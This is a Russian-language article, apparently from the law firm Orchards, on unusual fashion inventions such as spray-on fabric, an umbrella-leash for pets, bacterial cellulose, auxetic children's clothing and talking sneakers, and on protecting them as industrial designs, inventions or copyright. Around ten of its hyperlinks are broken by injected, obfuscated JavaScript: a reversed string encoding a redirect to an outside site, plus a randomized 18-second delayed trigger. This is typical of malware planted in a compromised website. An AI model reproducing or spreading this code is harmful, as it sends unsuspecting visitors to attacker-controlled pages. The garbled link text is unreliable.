Платье-спрей и говорящие кроссовки: необычные изобретения из мира моды

Комментарий Анастасии Сивицкой, советника Orchards, для Право.ru.

Платье, которое распылили на теле модели на одном из показов отгремевшей Парижской недели моды, произвело фурор среди зрителей. Фото и видео с мероприятия разлетелись по СМИ и соцсетям, хотя технологию ткани-спрея запатентовали еще девятнадцать лет назад. У многих fashion-индустрия ассоциируется только с эскизами, лекалами, фотосессиями и нарядами. Но мода уже давно пересекла и научную, и правовую плоскости. Причем не только в области авторского права, но и патентного. В нашем материале рассказываем о неординарных разработках в fashion-сфере и о том, какой способ защиты интеллектуальных прав для них можно выбрать.

Чтобы защитить свои разработки, дизайнеры и модельеры могут использовать инструменты патентного права. Например, часто одежду, обувь и украшения регистрируют как промышленный образец. Когда подают заявку на регистрацию дизайна как промобразца, эксперты патентного ведомства проверяют его новизну и оригинальность. Это toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torskogo-prava» target=»_blank»>снижает риски того, что на рынке появятся идентичные или похожие объекты. Кроме того, сведения о патенте публикуют в открытом доступе на сайте патентного ведомства. Благодаря этому, другие участники рынка узнают о существовании того или иного объекта, что поможет честно конкурировать. 

Распыляемая ткань и платье-спрей

На осенней неделе моды в Париже toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nanosnoe.html» rel=»noreferrer noopener» target=»_blank»>прошел показ бренда Coperni. На подиум вышла модель Белла Хадид, и на ее тело распылили белую субстанцию, которая приняла форму тела. Команда бренда убрала лишние куски материала, сделала разрез на юбке, и в итоге на модели получилось элегантное платье. Для этого показа Coperni toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomorrowsworldtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}today.com/2022/10/10/spray-on-fabric-technology-featured-in-paris-fashion-week/» rel=»noreferrer noopener» target=»_blank»>сотрудничал с испанским дизайнером и ученым Манелем Торресом и его командой из Лондонского инновационного центра биологических наук. Они и придумали такую технологию создания ткани.

Еще в прошлом веке Торрес хотел создать бесшовный и удобный материал будущего и проводил исследования в Имперском колледже Лондона. Над идеей он работал вместе с профессором факультета химического инжиниринга и химических технологий Полом Лакхэмом. 

В 2003 году Торрес и Лакхэм toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torage.googleapis.com/02/ab/24/05facdae938603/WO2003104540A2.pdf» rel=»noreferrer noopener» target=»_blank»>запатентовали non-woven fabric (от англ. — «нетканый материал») — метод создания ткани, которую образуют, распыляя волокна. В этом же году Торрес основал компанию Fabrican. Сначала она базировалась в Имперском колледже, затем ее расширили и релоцировали в центр биологических наук. Как указали на сайте компании, фирма сосредоточилась на научных исследованиях, чтобы вывести изобретение в новые сегменты рынка. Еще там отметили, что технологию распыления ткани можно использовать в разных индустриях: например, делать распыляемые платья, пластыри и салфетки. 

Зонт-поводок для животных

В 2005 году Ирина Жадан-Миллиган и Юрий Жадан toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torage.googleapis.com/ba/29/ae/17a6253abad95b/US6871616.pdf» rel=»noreferrer noopener» target=»_blank»>запатентовали в США зонт-поводок для животных. Изобретение защищает питомцев от осадков во время прогулки. В то же время зонт можно сложить и использовать аксессуар как обычный поводок. 

Зонт-поводок популярен и за пределами американских штатов. Подобные аксессуары часто продают на известных маркетплейсах в самых разных вариациях. Например, на Ozon и AliExpress. Во многих предложениях в качестве страны-производителя указан Китай. 

Пиджак из бактерий и материал на основе коллагена

В 2010 году дизайнер лондонской Школы моды и текстиля Сент-Мартинс Сюзанна Ли сделала пиджак из бактерий. На одной из конференций TED она подробно описала процесс выращивания ткани. В ванне дизайнер заваривала чай, добавляла в него сахар и затем бактерии. Микроорганизмы питались, размножались и плели волокна из целлюлозы, образуя на поверхности своеобразный холст. После этого бактерии при свете продолжали расти. Когда «ткань» была готова к сбору, ее доставали из ванны и промывали в холодной мыльной воде. Потом ее сушили, и в результате получался материал, похожий на прозрачную бумагу или эластичную искусственную кожу. Как пишет РБК, после высыхания материю можно отбеливать или покрывать растительными красками, например свекольным соком, индиго или куркумой. 

Разработка микробной целлюлозы входит в проект Ли BioCouture, цель которого — создавать прочные ткани, выращивая материю из бактерий. Недостаток одежды из подобных материалов — гидрофильность: когда «ткань» намокает, то разбухает и становится очень тяжелой. 

После презентации разработки Ли продолжила исследования, но в результате оставила идею с микробной целлюлозой, как toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory/2015/interview-suzanne-lee» rel=»noreferrer noopener» target=»_blank»>рассказала дизайнер в одном из интервью. На TED она познакомилась с Андрасом Форгаксом, основателем Modern Meadow Inc. Это нью-йоркская команда ученых, инженеров, дизайнеров и ремесленников, которые разрабатывают продукты животного происхождения и исследуют новые способы, чтобы создавать экологически чистые материалы. В 2014-м Ли стала креативным директором компании и занялась исследованиями уже с командой фирмы. В 2017-м они toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torage.googleapis.com/78/59/d9/665f3152dc7d3e/EP3205668A1.pdf» rel=»noreferrer noopener» target=»_blank»>запатентовали способ биофабрикации композитного материала. С помощью этого метода можно создавать прочный и эластичный материал на основе коллагена, и он может стать альтернативой обычной коже.

Одежда, которая растет вместе с ребенком

Британский дизайнер Райан Ясин в 2017 году придумал метод производства одежды, которая растет вместе с детьми. Он использовал ауксетические материалы, которые становятся толще и прочнее, если их растянуть. Сперва одежда из такого сырья имеет много складок, а по мере роста ребенка они распрямляются и предметы гардероба «растут» вместе с детьми. Когда ткань стирают, она не меняет размер и форму. Еще такие изделия защищают от ветра.

За это изобретение Ясин toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toraya-rastet-vmeste-s-rebenkom/?ysclid=l9oa4pmzgk535604595″ rel=»noreferrer noopener» target=»_blank»>выиграл James Dyson Award — международную премию в области промышленного дизайна и инженерного проектирования. Дизайнер toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torage.googleapis.com/25/25/67/09f423221ff7c2/EP3642408B1.pdf» rel=»noreferrer noopener» target=»_blank»>запатентовал изобретение в 2018-м. Как следует из сведений о патенте, его обладатель — британский бренд Petit Pli, который годом ранее основал Ясин. По мнению дизайнера, такая «растущая» одежда сэкономит деньги родителям и уменьшит количество мусора. 

Говорящие кроссовки

Технологии не обошли стороной и дизайнерские решения для спорта. В 2013 году на South by Southwest, ежегодном фестивале в области медиа, культуры и технологий, Google в коллаборации с компаниями Adidas, YesYesNo и рекламным агентством 72andSunny показали говорящие кроссовки. В обувь встроили акселератор, гироскоп и датчики давления, с помощью которых кроссовки измеряют уровень активности человека. В зависимости от того, стоит он или двигается, обувь генерирует разные подбадривающие фразы. На язычке кроссовок разместили динамик, через который обувь «разговаривает» с владельцем, оценивая его уровень подвижности. 

Помимо голосовых ответов, кроссовки синхронизируются с телефоном через блютус. Как объяснял руководитель маркетингового отдела Art, Copy & Code в Google Майк Глейзер, данные о движениях обладателя кроссовок передаются мобильному приложению и оно генерирует забавные мотивационные комментарии. 

Глейзер уточнил, что массово выпускать такую обувь не будут: их создали только для показа на мероприятии. В открытых источниках не удалось найти информацию о патенте на эту разработку, но тем не менее кроссовки стали одной из нашумевших модных технологий в 2013-м. О них писали The GuardianEngadgetAll Things Digital и другие СМИ.

<…>

Анастасия Сивицкая, адвокат, советник Orchards, отмечает, что в целом дизайнерские разработки патентоспособны именно как промышленные образцы, а не как изобретения. Последние — результаты интеллектуальной деятельности (РИД) в научно-технической сфере, а не в области дизайна. При этом эксперт полагает, что теоретически дизайнерская разработка может быть РИД одновременно и в индустрии дизайна, и в научно-технической сфере. Например, когда идет речь о космическом скафандре.

Дизайнерскую разработку возможно зарегистрировать в качестве изобретения, если она состоит не в создании конкретного силуэта или внешней формы, а в самом способе изготовления одежды, аксессуара, поясняет Анастасия Сивицкая.

В качестве примера патента на изобретение в fashion-сфере эксперт приводит съемную магнитную систему застегивания (патент № 2 595 970). Охране подлежит система, которую разработали, чтобы использовать в одежде, нижнем белье, изделиях из кожи, обуви и других принадлежностях. Она позволяет надежно застегнуться благодаря свойствам магнитов.

Арефьева считает, что для дизайнов сегмента fast fashion (от англ. — «быстрая мода, когда часто обновляют тенденции, ассортимент одежды») будет достаточно охраны авторским правом. Такие произведения быстро устаревают, поскольку спрос на них существует во время популярности какого-то тренда, разъясняет юрист, а значит, достаточно защиты авторских прав.

Сивицкая обращает внимание, что произведения дизайна зачастую создает коллектив авторов, сотрудники мастерской, дома моды, а не одно лицо — ведущий модельер или дизайнер. Поэтому важно обеспечить защиту авторских прав мастерской, дома мода, передавая им права авторов. Хотя авторское право не требует регистрации, Сивицкая рекомендует иметь доказательства, что это результат труда конкретного дизайнера или дома моды. Для этого можно не только хранить эскизы и материалы с элементами дизайна, но и активно демонтировать произведения на показах мод, выставках, публиковать в каталогах и журналах как работу конкретного дизайнера, дома моды. Дополнительно можно использовать знак охраны авторского права: латинская буква «С» в окружности и год, когда впервые опубликовали произведение, а еще товарный знак, объясняет Сивицкая.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory/243568/»>Ссылка на полную версию статьи>>

Подпишитесь на Telegram Orchards

X